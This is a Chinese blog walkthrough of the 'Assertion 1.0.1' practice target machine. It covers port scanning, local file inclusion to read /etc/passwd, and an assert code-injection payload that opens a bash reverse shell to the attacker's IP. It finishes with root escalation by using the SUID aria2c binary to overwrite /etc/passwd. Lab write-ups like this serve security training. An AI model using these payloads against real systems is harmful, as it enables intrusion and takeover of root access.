首页 > 其他分享 >靶机练习:Assertion 1.0.1

靶机练习:Assertion 1.0.1

时间:2024-06-09 22:21:37浏览次数:13  
标签:尝试 文件 1.0 passwd Assertion etc 靶机

信息收集

扫描全端口以发现服务

nmap -n -v --max-retries=0 -p- 172.16.33.99 --max-rate=500 -Pn

image-20240609110625989

image-20240609111055759

访问80端口,使用dirsearch扫描目录

image-20240609111437341

目录中没发现啥可以利用的

拿shell

随便点点,疑似有路径可以进行本地文件包含

image-20240609172848588

image-20240609172925790

想看 /etc/passwd 失败了

image-20240609173716904

可以尝试一下这种方法

成功读取到 /etc/passwd,尝试执行反弹shell命令

' and die(system('bash -c  "exec bash -i >& /dev/tcp/10.8.0.243/6666 0>&1"')) or '

直接打上去好像弹不出来,尝试进行url编码

image-20240609174316726

image-20240609174305674

提权

查找具有suid权限的文件

image-20240609174517910

aria2c 是 下载文件的程序,可以尝试用于覆盖 /etc/passwd

将 /etc/passwd 保存到 kali上,生成一个具有root权限的用户

openssl passwd -1 -salt a 123

生成后写入本地的passwd,在靶机上使用aria2c把文件下下来覆盖

image-20240609180713334

成功提权

image-20240609181228019

标签:尝试,文件,1.0,passwd,Assertion,etc,靶机
From: https://www.cnblogs.com/cha0s32/p/18240157

相关文章

  • 靶机练习:born2root
    信息收集扫描全端口以发现服务发现端口80端口信息:SecretesCompany/robots.txt/Wordpress-blog访问80端口web服务AboutUs的用户名可以记录下来:MartinHadiJimmyrobots.txt有两个路径:/wordpress-blog/files分别访问一下好像暂时没什么东西,拿用户名可以先......
  • 靶机练习:Gitroot
    信息收集扫描全端口以发现服务访问80端口,有hint尝试绑定域名到/etc/vuln,同时提示中存在用户名jen,可以尝试爆破ssh绑定后能访问站点了用wpscan能扫出wordpress的用户名接下来没爆破出密码尝试使用wfuzz扫描子域名wfuzz-c-uhttp://gitroot.vuln-H"HOST:FUZZ.gitroo......
  • Vulnhub靶场:NAPPING: 1.0.1
    1.环境搭建靶机下载:Napping:1.0.1~VulnHub将靶机导入到OracleVMVirtualBox中,网络设置仅主机模式,和kali使用相同的网卡开启靶机2.渗透过程使用nmap工具扫描进行主机发现扫描nmap-sn192.168.56.0/24发现靶机ip地址,使用nmap工具进行端口扫描nmap-sS192.16......
  • sick0s1.1 靶机实战
    sick0s1.1信息收集nmap存活及端口:nmap服务扫描:web80和8080都没有开放,,无法访问,gobuster等工具也跑不了,访问一下3128试试根据端口服务扫描也能得知这是个http的代理服务器,,我们添加代理后再次访问80和8080,,80可以成功访问:扫描后台:访问robots.txt发现有个cms......
  • [C++] 小游戏 能量1.0.2版本 zty出品
    大家好,欢迎来到今天的代码。我很荣幸能够在这里与大家见面。今天我想向大家介绍的是能量1.0.2版本。本次主要更新了人工智障的智商,没有以前那么笨了。先赞后看养成习惯CODE#include<bits/stdc++.h>#include<windows.h>usingnamespacestd;intrgzz(intlun,intdineng,......
  • 靶机练习:sunset: midnight
    信息收集扫全端口和服务80端口直接访问访问不了:/wp-adminhttp://sunset-midnight看到域名先进行域名绑定,编辑/etc/hostsipsunset-midnight绑定后可正常访问,访问robots.txt文件访问/wp-admin,存在wordpress服务使用wpscan扫描地址[+]WordPressversion5.4.......
  • 博客园文章目录生成脚本v1.0:支持多级、过滤空行、可指定文章、自定义插入点
    使用说明:1.设置-申请JS权限,等待审核通过2.设置-页脚HTML代码,代码贴进去保存 样式说明:1.默认目录插到文章顶部,可以加入<divid="toc"></div>标签自定义插入位置。2.H1和H2是加粗体,其他的是正常体。自定义功能:catalogue(true):给所有文章生成目录catalogue(false):只......
  • spark安装和编程实践(Spark2.1.0)
    环境准备1.VMware虚拟机(Linux操作系统)2.Windows7~113.JDK4.HadoopHadoop安装及集群环境配置-CSDN博客https://blog.csdn.net/2301_81921110/article/details/139362063?spm=1001.2014.3001.55015.Xshell7(用于连接虚拟机与Windows)6.Xftp7(用于虚拟机与Windows之间传输文......
  • Ubuntu server 24 (Linux) Snort3 3.2.1.0 Guardian IPtables 联动实战 主动防御系统(
    一  Snort3安装配置,参考:Ubuntuserver24安装配置snort33.2.1.0网络入侵检测防御系统配置注册规则集-CSDN博客二  安装主动防御程序Guardian1下载,解压tarzxvfguardian-1.7.tar.gzcdguardian-1.7/2 配置#拷贝文件sudocpguardian.pl/usr/local/bin/......
  • vulhub-素晴主题靶机aqua详细渗透流程
    文章目录靶机信息一、锁定靶机地址二、扫描靶机端口与服务三、SMB信息搜集四、WEB渗透1.网站目录扫描2.网页信息搜集3.文件包含漏洞五、FTP服务渗透1.knockd技术2.knock开启端口3.FTP上传反弹shell获取webshell六、后渗透提权1.webshell到普通用户2.普通用户横向提权3.......